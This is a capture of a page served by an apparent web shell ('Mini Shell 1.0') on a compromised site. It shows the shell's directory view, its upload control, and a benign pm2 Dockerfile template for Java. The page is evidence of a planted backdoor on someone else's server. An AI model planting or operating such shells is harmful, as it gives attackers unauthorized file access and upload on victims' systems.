HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1780863/root/usr/local/lib/node_modules/pm2/lib/templates/Dockerfiles/
Upload File :
Current File : //proc/1780863/root/usr/local/lib/node_modules/pm2/lib/templates/Dockerfiles/Dockerfile-java.tpl
FROM anapsix/alpine-java:latest

RUN apk update && apk add git && rm -rf /var/cache/apk/*
RUN npm install pm2@next -g
RUN mkdir -p /var/app

WORKDIR /var/app